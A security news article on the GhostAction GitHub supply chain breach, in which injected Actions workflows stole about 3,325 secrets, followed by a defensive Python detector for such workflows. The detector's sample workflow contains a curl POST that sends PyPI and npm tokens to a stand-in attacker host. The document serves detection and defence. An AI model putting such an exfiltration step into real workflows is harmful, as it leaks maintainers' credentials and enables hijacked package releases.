Cybercriminals Compromise 3,325 Sensitive Secrets in GhostAction GitHub Supply Chain Breach

A new supply chain attack on GitHub, known as ‘GhostAction,’ has compromised approximately 3,325 secrets, including tokens from PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The attack was uncovered by researchers at GitGuardian, who first detected signs of compromise in the FastUUID project on September 2, 2025. Attackers exploited compromised maintainer accounts to introduce a malicious GitHub Actions workflow file that activates automatically on ‘push’ or manual dispatch. Once triggered, this workflow reads secrets from the project’s GitHub Actions environment and exfiltrates them to an external domain controlled by the attackers via a curl POST request. In the case of FastUUID, the attackers successfully stole the project’s PyPI token, although no malicious package releases occurred before the compromise was identified and addressed.

Further investigation revealed that the GhostAction campaign was extensive, affecting at least 817 repositories, all of which sent secrets to the same endpoint, ‘bold-dhawan[.]45-139-104-115[.]plesk[.]page.’ The attackers enumerated legitimate secret names from the repositories’ existing workflows and hardcoded those names into their own workflows so that each injected job captured whatever secret types the project already used. Upon discovering the full scope of the attack on September 5, GitGuardian opened issues in 573 impacted repositories and notified the security teams of GitHub, npm, and PyPI. A hundred GitHub repositories had already detected the compromise and reverted the malicious changes. Following the discovery, the exfiltration endpoint ceased to resolve. The researchers noted that at least nine npm and 15 PyPI packages were directly affected, meaning the stolen publishing tokens could be used to release malicious or trojanised versions until maintainers revoke them. GitGuardian’s analysis indicated that compromised tokens spanned multiple package ecosystems, including Rust crates and npm packages, with several companies experiencing complete SDK portfolio compromises across Python, Rust, JavaScript, and Go repositories. Although there were some similarities to the ‘s1ngularity’ campaign from late August, GitGuardian does not believe there is a direct connection between the two operations.
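A defender-side check for the workflow pattern described above (a step that reads repository secrets and hands them to curl bound for an unlisted host), written as an added example and not taken from GitGuardian or the original write-up. The trusted-host allowlist, the sample workflow and the host name in it are constructed, and the step splitting is a regex heuristic rather than a YAML parser.

```python
import re

# Constructed allowlist: hosts a release workflow is expected to contact (assumption; tune per org).
TRUSTED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org", "registry.npmjs.org"}
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")  # ${{ secrets.NAME }}
NET_TOOL = re.compile(r"\b(curl|wget)\b")                               # outbound HTTP from a run: step
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")                     # host part of any URL
STEP_START = re.compile(r"^\s*-\s+(name|uses|run|env|id):")            # first line of a step item

def split_steps(workflow_text):
    """Crudely split workflow YAML into step chunks (one '- key:' item to the next); no parser needed."""
    steps, current = [], []
    for line in workflow_text.splitlines():
        if STEP_START.match(line) and current:
            steps.append("\n".join(current))
            current = []
        current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps

def find_exfil_steps(workflow_text, trusted_hosts=TRUSTED_HOSTS):
    """Flag steps that reference secrets and also reach an unlisted host with curl/wget."""
    findings = []
    for chunk in split_steps(workflow_text):
        secrets = sorted(set(SECRET_REF.findall(chunk)))
        hosts = sorted({h for h in URL_HOST.findall(chunk) if h not in trusted_hosts})
        if secrets and hosts and NET_TOOL.search(chunk):
            findings.append({"secrets": secrets, "hosts": hosts})
    return findings

# Constructed sample: a normal publish step followed by one shaped like the GhostAction pattern.
SAMPLE_WORKFLOW = """\
on: [push, workflow_dispatch]
jobs:
  publish:
    steps:
      - name: Publish to PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
      - name: Report build status
        env:
          TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          NPM: ${{ secrets.NPM_TOKEN }}
        run: curl -X POST -d "t=$TOKEN&n=$NPM" https://attacker-controlled.example/collect
"""

if __name__ == "__main__":
    print(find_exfil_steps(SAMPLE_WORKFLOW))
```

The legitimate publish step references a secret but contacts no unlisted host, so only the second step is reported; running this over every file under `.github/workflows/` on each push is a cheap complement to rotating the leaked tokens.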

Categories: Supply Chain Attack, Compromised Secrets, GitHub Security

Tags: Supply Chain Attack, GhostAction, GitHub, Secrets, Compromise, Malicious Workflow, Exfiltration, PyPI, npm, DockerHub
